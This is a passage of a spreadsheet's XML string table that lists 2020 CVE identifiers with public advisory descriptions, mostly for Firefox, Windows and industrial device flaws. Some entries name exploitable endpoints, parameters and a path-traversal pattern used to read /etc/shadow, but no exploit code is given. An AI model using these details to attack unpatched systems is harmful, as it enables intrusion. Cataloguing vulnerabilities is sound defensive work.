    <t>Improper input validation in some Intel(R) Graphics Drivers before version 26.20.100.8141 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12386</t>
  </si>
  <si>
    <t>Out-of-bounds write in some Intel(R) Graphics Drivers before version 15.36.39.5143 may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12387</t>
  </si>
  <si>
    <t>A race condition when running shutdown code for Web Worker led to a use-after-free vulnerability. This resulted in a potentially exploitable crash. This vulnerability affects Firefox ESR &lt; 68.8, Firefox &lt; 76, and Thunderbird &lt; 68.8.0.</t>
  </si>
  <si>
    <t>CVE-2020-12388</t>
  </si>
  <si>
    <t>The Firefox content processes did not sufficiently lockdown access control which could result in a sandbox escape. *Note: this issue only affects Firefox on Windows operating systems.*. This vulnerability affects Firefox ESR &lt; 68.8 and Firefox &lt; 76.</t>
  </si>
  <si>
    <t>CVE-2020-12389</t>
  </si>
  <si>
    <t>CVE-2020-1239</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1238.</t>
  </si>
  <si>
    <t>CVE-2020-12390</t>
  </si>
  <si>
    <t>Incorrect origin serialization of URLs with IPv6 addresses could lead to incorrect security checks. This vulnerability affects Firefox &lt; 76.</t>
  </si>
  <si>
    <t>CVE-2020-12391</t>
  </si>
  <si>
    <t>Documents formed using data: URLs in an OBJECT element failed to inherit the CSP of the creating context. This allowed the execution of scripts that should have been blocked, albeit with a unique opaque origin. This vulnerability affects Firefox &lt; 76.</t>
  </si>
  <si>
    <t>CVE-2020-12392</t>
  </si>
  <si>
    <t>The 'Copy as cURL' feature of Devtools' network tab did not properly escape the HTTP POST data of a request, which can be controlled by the website. If a user used the 'Copy as cURL' feature and pasted the command into a terminal, it could have resulted in the disclosure of local files. This vulnerability affects Firefox ESR &lt; 68.8, Firefox &lt; 76, and Thunderbird &lt; 68.8.0.</t>
  </si>
  <si>
    <t>CVE-2020-12393</t>
  </si>
  <si>
    <t>The 'Copy as cURL' feature of Devtools' network tab did not properly escape the HTTP method of a request, which can be controlled by the website. If a user used the 'Copy as cURL' feature and pasted the command into a terminal, it could have resulted in command injection and arbitrary command execution. *Note: this issue only affects Firefox on Windows operating systems.*. This vulnerability affects Firefox ESR &lt; 68.8, Firefox &lt; 76, and Thunderbird &lt; 68.8.0.</t>
  </si>
  <si>
    <t>CVE-2020-12394</t>
  </si>
  <si>
    <t>A logic flaw in our location bar implementation could have allowed a local attacker to spoof the current location by selecting a different origin and removing focus from the input element. This vulnerability affects Firefox &lt; 76.</t>
  </si>
  <si>
    <t>CVE-2020-12395</t>
  </si>
  <si>
    <t>Mozilla developers and community members reported memory safety bugs present in Firefox 75 and Firefox ESR 68.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR &lt; 68.8, Firefox &lt; 76, and Thunderbird &lt; 68.8.0.</t>
  </si>
  <si>
    <t>CVE-2020-12396</t>
  </si>
  <si>
    <t>Mozilla developers and community members reported memory safety bugs present in Firefox 75. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 76.</t>
  </si>
  <si>
    <t>CVE-2020-12397</t>
  </si>
  <si>
    <t>By encoding Unicode whitespace characters within the From email header, an attacker can spoof the sender email address that Thunderbird displays. This vulnerability affects Thunderbird &lt; 68.8.0.</t>
  </si>
  <si>
    <t>CVE-2020-12398</t>
  </si>
  <si>
    <t>If Thunderbird is configured to use STARTTLS for an IMAP server, and the server sends a PREAUTH response, then Thunderbird will continue with an unencrypted connection, causing email data to be sent without protection. This vulnerability affects Thunderbird &lt; 68.9.0.</t>
  </si>
  <si>
    <t>CVE-2020-12399</t>
  </si>
  <si>
    <t>NSS has shown timing differences when performing DSA signatures, which was exploitable and could eventually leak private keys. This vulnerability affects Thunderbird &lt; 68.9.0, Firefox &lt; 77, and Firefox ESR &lt; 68.9.</t>
  </si>
  <si>
    <t>CVE-2020-1240</t>
  </si>
  <si>
    <t>CVE-2020-12400</t>
  </si>
  <si>
    <t>When converting coordinates from projective to affine, the modular inversion was not performed in constant time, resulting in a possible timing-based side channel attack. This vulnerability affects Firefox &lt; 80 and Firefox for Android &lt; 80.</t>
  </si>
  <si>
    <t>CVE-2020-12401</t>
  </si>
  <si>
    <t>During ECDSA signature generation, padding applied in the nonce designed to ensure constant-time scalar multiplication was removed, resulting in variable-time execution dependent on secret data. This vulnerability affects Firefox &lt; 80 and Firefox for Android &lt; 80.</t>
  </si>
  <si>
    <t>CVE-2020-12402</t>
  </si>
  <si>
    <t>During RSA key generation, bignum implementations used a variation of the Binary Extended Euclidean Algorithm which entailed significantly input-dependent flow. This allowed an attacker able to perform electromagnetic-based side channel attacks to record traces leading to the recovery of the secret primes. *Note:* An unmodified Firefox browser does not generate RSA keys in normal operation and is not affected, but products built on top of it might. This vulnerability affects Firefox &lt; 78.</t>
  </si>
  <si>
    <t>CVE-2020-12403</t>
  </si>
  <si>
    <t>A flaw was found in the way CHACHA20-POLY1305 was implemented in NSS in versions before 3.55. When using multi-part Chacha20, it could cause out-of-bounds reads. This issue was fixed by explicitly disabling multi-part ChaCha20 (which was not functioning correctly) and strictly enforcing tag length. The highest threat from this vulnerability is to confidentiality and system availability.</t>
  </si>
  <si>
    <t>CVE-2020-12404</t>
  </si>
  <si>
    <t>For native-to-JS bridging the app requires a unique token to be passed that ensures non-app code can't call the bridging functions. That token could leak when used for downloading files. This vulnerability affects Firefox for iOS &lt; 26.</t>
  </si>
  <si>
    <t>CVE-2020-12405</t>
  </si>
  <si>
    <t>When browsing a malicious page, a race condition in our SharedWorkerService could occur and lead to a potentially exploitable crash. This vulnerability affects Thunderbird &lt; 68.9.0, Firefox &lt; 77, and Firefox ESR &lt; 68.9.</t>
  </si>
  <si>
    <t>CVE-2020-12406</t>
  </si>
  <si>
    <t>Mozilla Developer Iain Ireland discovered a missing type check during unboxed objects removal, resulting in a crash. We presume that with enough effort that it could be exploited to run arbitrary code. This vulnerability affects Thunderbird &lt; 68.9.0, Firefox &lt; 77, and Firefox ESR &lt; 68.9.</t>
  </si>
  <si>
    <t>CVE-2020-12407</t>
  </si>
  <si>
    <t>Mozilla Developer Nicolas Silva found that when using WebRender, Firefox would under certain conditions leak arbitrary GPU memory to the visible screen. The leaked memory content was visible to the user, but not observable from web content. This vulnerability affects Firefox &lt; 77.</t>
  </si>
  <si>
    <t>CVE-2020-12408</t>
  </si>
  <si>
    <t>When browsing a document hosted on an IP address, an attacker could insert certain characters to flip domain and path information in the address bar. This vulnerability affects Firefox &lt; 77.</t>
  </si>
  <si>
    <t>CVE-2020-12409</t>
  </si>
  <si>
    <t>When using certain blank characters in a URL, they where incorrectly rendered as spaces instead of an encoded URL. This vulnerability affects Firefox &lt; 77.</t>
  </si>
  <si>
    <t>CVE-2020-1241</t>
  </si>
  <si>
    <t>A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters.To exploit the vulnerability, a locally-authenticated attacker could attempt to run a specially crafted application on a targeted system.The update addresses the vulnerability by correcting how Windows Kernel handles parameter sanitization., aka 'Windows Kernel Security Feature Bypass Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12410</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 76 and Firefox ESR 68.8. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird &lt; 68.9.0, Firefox &lt; 77, and Firefox ESR &lt; 68.9.</t>
  </si>
  <si>
    <t>CVE-2020-12411</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 76. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 77.</t>
  </si>
  <si>
    <t>CVE-2020-12412</t>
  </si>
  <si>
    <t>By navigating a tab using the history API, an attacker could cause the address bar to display the incorrect domain (with the https:// scheme, a blocked port number such as '1', and without a lock icon) while controlling the page contents. This vulnerability affects Firefox &lt; 70.</t>
  </si>
  <si>
    <t>CVE-2020-12414</t>
  </si>
  <si>
    <t>IndexedDB should be cleared when leaving private browsing mode and it is not, the API for WKWebViewConfiguration was being used incorrectly and requires the private instance of this object be deleted when leaving private mode. This vulnerability affects Firefox for iOS &lt; 27.</t>
  </si>
  <si>
    <t>CVE-2020-12415</t>
  </si>
  <si>
    <t>When "%2F" was present in a manifest URL, Firefox's AppCache behavior may have become confused and allowed a manifest to be served from a subdirectory. This could cause the appcache to be used to service requests for the top level directory. This vulnerability affects Firefox &lt; 78.</t>
  </si>
  <si>
    <t>CVE-2020-12416</t>
  </si>
  <si>
    <t>A VideoStreamEncoder may have been freed in a race condition with VideoBroadcaster::AddOrUpdateSink, resulting in a use-after-free, memory corruption, and a potentially exploitable crash. This vulnerability affects Firefox &lt; 78.</t>
  </si>
  <si>
    <t>CVE-2020-12417</t>
  </si>
  <si>
    <t>Due to confusion about ValueTags on JavaScript Objects, an object may pass through the type barrier, resulting in memory corruption and a potentially exploitable crash. *Note: this issue only affects Firefox on ARM64 platforms.* This vulnerability affects Firefox ESR &lt; 68.10, Firefox &lt; 78, and Thunderbird &lt; 68.10.0.</t>
  </si>
  <si>
    <t>CVE-2020-12418</t>
  </si>
  <si>
    <t>Manipulating individual parts of a URL object could have caused an out-of-bounds read, leaking process memory to malicious JavaScript. This vulnerability affects Firefox ESR &lt; 68.10, Firefox &lt; 78, and Thunderbird &lt; 68.10.0.</t>
  </si>
  <si>
    <t>CVE-2020-12419</t>
  </si>
  <si>
    <t>When processing callbacks that occurred during window flushing in the parent process, the associated window may die; causing a use-after-free condition. This could have led to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox ESR &lt; 68.10, Firefox &lt; 78, and Thunderbird &lt; 68.10.0.</t>
  </si>
  <si>
    <t>CVE-2020-1242</t>
  </si>
  <si>
    <t>CVE-2020-12420</t>
  </si>
  <si>
    <t>When trying to connect to a STUN server, a race condition could have caused a use-after-free of a pointer, leading to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox ESR &lt; 68.10, Firefox &lt; 78, and Thunderbird &lt; 68.10.0.</t>
  </si>
  <si>
    <t>CVE-2020-12421</t>
  </si>
  <si>
    <t>When performing add-on updates, certificate chains terminating in non-built-in-roots were rejected (even if they were legitimately added by an administrator.) This could have caused add-ons to become out-of-date silently without notification to the user. This vulnerability affects Firefox ESR &lt; 68.10, Firefox &lt; 78, and Thunderbird &lt; 68.10.0.</t>
  </si>
  <si>
    <t>CVE-2020-12422</t>
  </si>
  <si>
    <t>In non-standard configurations, a JPEG image created by JavaScript could have caused an internal variable to overflow, resulting in an out of bounds write, memory corruption, and a potentially exploitable crash. This vulnerability affects Firefox &lt; 78.</t>
  </si>
  <si>
    <t>CVE-2020-12423</t>
  </si>
  <si>
    <t>When the Windows DLL "webauthn.dll" was missing from the Operating System, and a malicious one was placed in a folder in the user's %PATH%, Firefox may have loaded the DLL, leading to arbitrary code execution. *Note: This issue only affects the Windows operating system; other operating systems are unaffected.* This vulnerability affects Firefox &lt; 78.</t>
  </si>
  <si>
    <t>CVE-2020-12424</t>
  </si>
  <si>
    <t>When constructing a permission prompt for WebRTC, a URI was supplied from the content process. This URI was untrusted, and could have been the URI of an origin that was previously granted permission; bypassing the prompt. This vulnerability affects Firefox &lt; 78.</t>
  </si>
  <si>
    <t>CVE-2020-12425</t>
  </si>
  <si>
    <t>Due to confusion processing a hyphen character in Date.parse(), a one-byte out of bounds read could have occurred, leading to potential information disclosure. This vulnerability affects Firefox &lt; 78.</t>
  </si>
  <si>
    <t>CVE-2020-12426</t>
  </si>
  <si>
    <t>Mozilla developers and community members reported memory safety bugs present in Firefox 77. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 78.</t>
  </si>
  <si>
    <t>CVE-2020-12427</t>
  </si>
  <si>
    <t>The Western Digital WD Discovery application before 3.8.229 for MyCloud Home on Windows and macOS is vulnerable to CSRF, with impacts such as stealing data, modifying disk contents, or exhausting disk space.</t>
  </si>
  <si>
    <t>CVE-2020-12429</t>
  </si>
  <si>
    <t>Online Course Registration 2.0 has multiple SQL injections that would can lead to a complete database compromise and authentication bypass in the login pages: admin/change-password.php, admin/check_availability.php, admin/index.php, change-password.php, check_availability.php, includes/header.php, index.php, and pincode-verification.php.</t>
  </si>
  <si>
    <t>CVE-2020-1243</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system.To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application.The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests., aka 'Windows Hyper-V Denial of Service Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12430</t>
  </si>
  <si>
    <t>An issue was discovered in qemuDomainGetStatsIOThread in qemu/qemu_driver.c in libvirt 4.10.0 though 6.x before 6.1.0. A memory leak was found in the virDomainListGetStats libvirt API that is responsible for retrieving domain statistics when managing QEMU guests. This flaw allows unprivileged users with a read-only connection to cause a memory leak in the domstats command, resulting in a potential denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12431</t>
  </si>
  <si>
    <t>A Windows privilege change issue was discovered in Splashtop Software Updater before 1.5.6.16. Insecure permissions on the configuration file and named pipe allow for local privilege escalation to NT AUTHORITY/SYSTEM, by forcing a permission change to any Splashtop files and directories, with resultant DLL hijacking. This product is bundled with Splashtop Streamer (before 3.3.8.0) and Splashtop Business (before 3.3.8.0).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-12432</t>
  </si>
  <si>
    <t>The WOPI API integration for Vereign Collabora CODE through 4.2.2 does not properly restrict delivery of JavaScript to a victim's browser, and lacks proper MIME type access control, which could lead to XSS that steals account credentials via cookies or local storage. The attacker must first obtain an API access token, which can be accomplished if the attacker is able to upload a .docx or .odt file. The associated API endpoints for exploitation are /wopi/files and /wopi/getAccessToken.</t>
  </si>
  <si>
    <t>CVE-2020-12438</t>
  </si>
  <si>
    <t>An XSS vulnerability exists in the banners.php page of PHP-Fusion 9.03.50. This can be exploited because the only security measure used against XSS is the stripping of SCRIPT tags. A malicious actor can use HTML event handlers to run JavaScript instead of using SCRIPT tags.</t>
  </si>
  <si>
    <t>CVE-2020-12439</t>
  </si>
  <si>
    <t>Grin before 3.1.0 allows attackers to adversely affect availability of data on a Mimblewimble blockchain.</t>
  </si>
  <si>
    <t>CVE-2020-1244</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations, aka 'Connected User Experiences and Telemetry Service Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-1120.</t>
  </si>
  <si>
    <t>CVE-2020-12441</t>
  </si>
  <si>
    <t>Denial-of-Service (DoS) in Ivanti Service Manager HEAT Remote Control 7.4 due to a buffer overflow in the protocol parser of the ‘HEATRemoteService’ agent. The DoS can be triggered by sending a specially crafted network packet.</t>
  </si>
  <si>
    <t>CVE-2020-12442</t>
  </si>
  <si>
    <t>Ivanti Avalanche 6.3 allows a SQL injection that is vaguely associated with the Apache HTTP Server, aka Bug 683250.</t>
  </si>
  <si>
    <t>CVE-2020-12443</t>
  </si>
  <si>
    <t>BigBlueButton before 2.2.6 allows remote attackers to read arbitrary files because the presfilename (lowercase) value can be a .pdf filename while the presFilename (mixed case) value has a ../ sequence. This can be leveraged for privilege escalation via a directory traversal to bigbluebutton.properties. NOTE: this issue exists because of an ineffective mitigation to CVE-2020-12112 in which there was an attempted fix within an NGINX configuration file, without considering that the relevant part of NGINX is case-insensitive.</t>
  </si>
  <si>
    <t>CVE-2020-12446</t>
  </si>
  <si>
    <t>The ene.sys driver in G.SKILL Trident Z Lighting Control through 1.00.08 exposes mapping and un-mapping of physical memory, reading and writing to Model Specific Register (MSR) registers, and input from and output to I/O ports to local non-privileged users. This leads to privilege escalation to NT AUTHORITY\SYSTEM.</t>
  </si>
  <si>
    <t>CVE-2020-12447</t>
  </si>
  <si>
    <t>A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal, as demonstrated by reading /etc/shadow.</t>
  </si>
  <si>
    <t>CVE-2020-12448</t>
  </si>
  <si>
    <t>GitLab EE 12.8 and later allows Exposure of Sensitive Information to an Unauthorized Actor via NuGet.</t>
  </si>
  <si>
    <t>CVE-2020-1245</t>
  </si>
  <si>
    <t>CVE-2020-12456</t>
  </si>
  <si>
    <t>A remote code execution vulnerability in Mitel MiVoice Connect Client before 214.100.1223.0 could allow an attacker to execute arbitrary code in the chat notification window, due to improper rendering of chat messages. A successful exploit could allow an attacker to steal session cookies, perform directory traversal, and execute arbitrary scripts in the context of the Connect client.</t>
  </si>
  <si>
    <t>CVE-2020-12457</t>
  </si>
  <si>
    <t>An issue was discovered in wolfSSL before 4.5.0. It mishandles the change_cipher_spec (CCS) message processing logic for TLS 1.3. If an attacker sends ChangeCipherSpec messages in a crafted way involving more than one in a row, the server becomes stuck in the ProcessReply() loop, i.e., a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12458</t>
  </si>
  <si>
    <t>An information-disclosure flaw was found in Grafana through 6.7.3. The database directory /var/lib/grafana and database file /var/lib/grafana/grafana.db are world readable. This can result in exposure of sensitive information (e.g., cleartext or encrypted datasource passwords).</t>
  </si>
  <si>
    <t>CVE-2020-12459</t>
  </si>
  <si>
    <t>In certain Red Hat packages for Grafana 6.x through 6.3.6, the configuration files /etc/grafana/grafana.ini and /etc/grafana/ldap.toml (which contain a secret_key and a bind_password) are world readable.</t>
  </si>
  <si>
    <t>CVE-2020-1246</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.</t>
  </si>
  <si>
    <t>CVE-2020-12460</t>
  </si>
  <si>
    <t>OpenDMARC through 1.3.2 and 1.4.x through 1.4.0-Beta1 has improper null termination in the function opendmarc_xml_parse that can result in a one-byte heap overflow in opendmarc_xml when parsing a specially crafted DMARC aggregate report. This can cause remote memory corruption when a '\0' byte overwrites the heap metadata of the next chunk and its PREV_INUSE flag.</t>
  </si>
  <si>
    <t>CVE-2020-12461</t>
  </si>
  <si>
    <t>PHP-Fusion 9.03.50 allows SQL Injection because maincore.php has an insufficient protection mechanism. An attacker can develop a crafted payload that can be inserted into the sort_order GET parameter on the members.php members search page. This parameter allows for control over anything after the ORDER BY clause in the SQL query.</t>
  </si>
  <si>
    <t>CVE-2020-12462</t>
  </si>
  <si>
    <t>The ninja-forms plugin before 3.4.24.2 for WordPress allows CSRF with resultant XSS.</t>
  </si>
  <si>
    <t>CVE-2020-12463</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Avira Software Updater before 2.0.6.27476 due to improperly handling file hard links. This allows local users to obtain take control of arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-12464</t>
  </si>
  <si>
    <t>usb_sg_cancel in drivers/usb/core/message.c in the Linux kernel before 5.6.8 has a use-after-free because a transfer occurs without a reference, aka CID-056ad39ee925.</t>
  </si>
  <si>
    <t>CVE-2020-12465</t>
  </si>
  <si>
    <t>An array overflow was discovered in mt76_add_fragment in drivers/net/wireless/mediatek/mt76/dma.c in the Linux kernel before 5.5.10, aka CID-b102f0c522cf. An oversized packet with too many rx fragments can corrupt memory of adjacent pages.</t>
  </si>
  <si>
    <t>CVE-2020-12467</t>
  </si>
  <si>
    <t>Subrion CMS 4.2.1 allows session fixation via an alphanumeric value in a session cookie.</t>
  </si>
  <si>
    <t>CVE-2020-12468</t>
  </si>
  <si>
    <t>Subrion CMS 4.2.1 allows CSV injection via a phrase value within a language. This is related to phrases/add/ and languages/download/.</t>
  </si>
  <si>
    <t>CVE-2020-12469</t>
  </si>
  <si>
    <t>admin/blocks.php in Subrion CMS through 4.2.1 allows PHP Object Injection (with resultant file deletion) via serialized data in the subpages value within a block to blocks/edit.</t>
  </si>
  <si>
    <t>CVE-2020-1247</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1207, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310.</t>
  </si>
  <si>
    <t>CVE-2020-12470</t>
  </si>
  <si>
    <t>MonoX through 5.1.40.5152 allows administrators to execute arbitrary code by modifying an ASPX template.</t>
  </si>
  <si>
    <t>CVE-2020-12471</t>
  </si>
  <si>
    <t>MonoX through 5.1.40.5152 allows remote code execution via HTML5Upload.ashx or Pages/SocialNetworking/lng/en-US/PhotoGallery.aspx because of deserialization in ModuleGallery.HTML5Upload, ModuleGallery.SilverLightUploadModule, HTML5Upload, and SilverLightUploadHandler.</t>
  </si>
  <si>
    <t>CVE-2020-12472</t>
  </si>
  <si>
    <t>MonoX through 5.1.40.5152 allows stored XSS via User Status, Blog Comments, or Blog Description.</t>
  </si>
  <si>
    <t>CVE-2020-12473</t>
  </si>
  <si>
    <t>MonoX through 5.1.40.5152 allows admins to execute arbitrary programs by reconfiguring the Converter Executable setting from ffmpeg.exe to a different program.</t>
  </si>
  <si>
    <t>CVE-2020-12474</t>
  </si>
  <si>
    <t>Telegram Desktop through 2.0.1, Telegram through 6.0.1 for Android, and Telegram through 6.0.1 for iOS allow an IDN Homograph attack via Punycode in a public URL or a group chat invitation URL.</t>
  </si>
  <si>
    <t>CVE-2020-12475</t>
  </si>
  <si>
    <t>TP-Link Omada Controller Software 3.2.6 allows Directory Traversal for reading arbitrary files via com.tp_link.eap.web.portal.PortalController.getAdvertiseFile in /opt/tplink/EAPController/lib/eap-web-3.2.6.jar.</t>
  </si>
  <si>
    <t>CVE-2020-12477</t>
  </si>
  <si>
    <t>The REST API functions in TeamPass 2.1.27.36 allow any user with a valid API token to bypass IP address whitelist restrictions via an X-Forwarded-For client HTTP header to the getIp function.</t>
  </si>
  <si>
    <t>CVE-2020-12478</t>
  </si>
  <si>
    <t>TeamPass 2.1.27.36 allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files.</t>
  </si>
  <si>
    <t>CVE-2020-12479</t>
  </si>
  <si>
    <t>TeamPass 2.1.27.36 allows any authenticated TeamPass user to trigger a PHP file include vulnerability via a crafted HTTP request with sources/users.queries.php newValue directory traversal.</t>
  </si>
  <si>
    <t>CVE-2020-1248</t>
  </si>
  <si>
    <t>CVE-2020-12480</t>
  </si>
  <si>
    <t>In Play Framework 2.6.0 through 2.8.1, the CSRF filter can be bypassed by making CORS simple requests with content types that contain parameters that can't be parsed.</t>
  </si>
  <si>
    <t>CVE-2020-12483</t>
  </si>
  <si>
    <t>The appstore before 8.12.0.0 exposes some of its components, and the attacker can cause remote download and install apps through carefully constructed parameters.</t>
  </si>
  <si>
    <t>CVE-2020-12485</t>
  </si>
  <si>
    <t>The frame touch module does not make validity judgments on parameter lengths when processing specific parameters,which caused out of the boundary when memory access.The vulnerability eventually leads to a local DOS on the device.</t>
  </si>
  <si>
    <t>CVE-2020-12488</t>
  </si>
  <si>
    <t>The attacker can access the sensitive information stored within the jovi Smart Scene module by entering carefully constructed commands without requesting permission.</t>
  </si>
  <si>
    <t>CVE-2020-1249</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1353, CVE-2020-1370, CVE-2020-1399, CVE-2020-1404, CVE-2020-1413, CVE-2020-1414, CVE-2020-1415, CVE-2020-1422.</t>
  </si>
  <si>
    <t>CVE-2020-12493</t>
  </si>
  <si>
    <t>An open port used for debugging in SWARCOs CPU LS4000 Series with versions starting with G4... grants root access to the device without access control via network. A malicious user could use this vulnerability to get access to the device and disturb operations with connected devices.</t>
  </si>
  <si>
    <t>CVE-2020-12494</t>
  </si>
  <si>
    <t>Beckhoff's TwinCAT RT network driver for Intel 8254x and 8255x is providing EtherCAT functionality. The driver implements real-time features. Except for Ethernet frames sent from real-time functionality, all other Ethernet frames sent through the driver are not padded if their payload is less than the minimum Ethernet frame size. Instead, arbitrary memory content is transmitted within in the padding bytes of the frame. Most likely this memory contains slices from previously transmitted or received frames. By this method, memory content is disclosed, however, an attacker can hardly control which memory content is affected. For example, the disclosure can be provoked with small sized ICMP echo requests sent to the device.</t>
  </si>
  <si>
    <t>CVE-2020-12495</t>
  </si>
  <si>
    <t>Endress+Hauser Ecograph T (Neutral/Private Label) (RSG35, ORSG35) with Firmware version prior to V2.0.0 is prone to improper privilege management. The affected device has a web-based user interface with a role-based access system. Users with different roles have different write and read privileges. The access system is based on dynamic "tokens". The vulnerability is that user sessions are not closed correctly and a user with fewer rights is assigned the higher rights when he logs on.</t>
  </si>
  <si>
    <t>CVE-2020-12496</t>
  </si>
  <si>
    <t>Endress+Hauser Ecograph T (Neutral/Private Label) (RSG35, ORSG35) and Memograph M (Neutral/Private Label) (RSG45, ORSG45) with Firmware version V2.0.0 and above is prone to exposure of sensitive information to an unauthorized actor. The firmware release has a dynamic token for each request submitted to the server, which makes repeating requests and analysis complex enough. Nevertheless, it's possible and during the analysis it was discovered that it also has an issue with the access-control matrix on the server-side. It was found that a user with low rights can get information from endpoints that should not be available to this user.</t>
  </si>
  <si>
    <t>CVE-2020-12497</t>
  </si>
  <si>
    <t>PLCopen XML file parsing in Phoenix Contact PC Worx and PC Worx Express version 1.87 and earlier can lead to a stack-based overflow. Manipulated PC Worx projects could lead to a remote code execution due to insufficient input data validation.</t>
  </si>
  <si>
    <t>CVE-2020-12498</t>
  </si>
  <si>
    <t>mwe file parsing in Phoenix Contact PC Worx and PC Worx Express version 1.87 and earlier is vulnerable to out-of-bounds read remote code execution. Manipulated PC Worx projects could lead to a remote code execution due to insufficient input data validation.</t>
  </si>
  <si>
    <t>CVE-2020-12499</t>
  </si>
  <si>
    <t>In PHOENIX CONTACT PLCnext Engineer version 2020.3.1 and earlier an improper path sanitation vulnerability exists on import of project files.</t>
  </si>
  <si>
    <t>CVE-2020-1250</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the win32k component improperly provides kernel information, aka 'Win32k Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0941.</t>
  </si>
  <si>
    <t>CVE-2020-12500</t>
  </si>
  <si>
    <t>Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) allows unauthenticated device administration.</t>
  </si>
  <si>
    <t>CVE-2020-12501</t>
  </si>
  <si>
    <t>Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) use undocumented accounts.</t>
  </si>
  <si>
    <t>CVE-2020-12502</t>
  </si>
  <si>
    <t>Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) and ICRL-M-8RJ45/4SFP-G-DIN, ICRL-M-16RJ45/4CP-G-DIN FW 1.2.3 and below is prone to unauthenticated device administration.</t>
  </si>
  <si>
    <t>CVE-2020-12503</t>
  </si>
  <si>
    <t>Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) and ICRL-M-8RJ45/4SFP-G-DIN, ICRL-M-16RJ45/4CP-G-DIN FW 1.2.3 and below is prone to multiple authenticated command injections.</t>
  </si>
  <si>
    <t>CVE-2020-12504</t>
  </si>
  <si>
    <t>Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) and ICRL-M-8RJ45/4SFP-G-DIN, ICRL-M-16RJ45/4CP-G-DIN FW 1.2.3 and below has an active TFTP-Service.</t>
  </si>
  <si>
    <t>912</t>
  </si>
  <si>
    <t>CVE-2020-12505</t>
  </si>
  <si>
    <t>Improper Authentication vulnerability in WAGO 750-8XX series with FW version &lt;= FW07 allows an attacker to change some special parameters without authentication. This issue affects: WAGO 750-852, WAGO 750-880/xxx-xxx, WAGO 750-881, WAGO 750-831/xxx-xxx, WAGO 750-882, WAGO 750-885/xxx-xxx, WAGO 750-889 in versions FW07 and below.</t>
  </si>
  <si>
    <t>CVE-2020-12506</t>
  </si>
  <si>
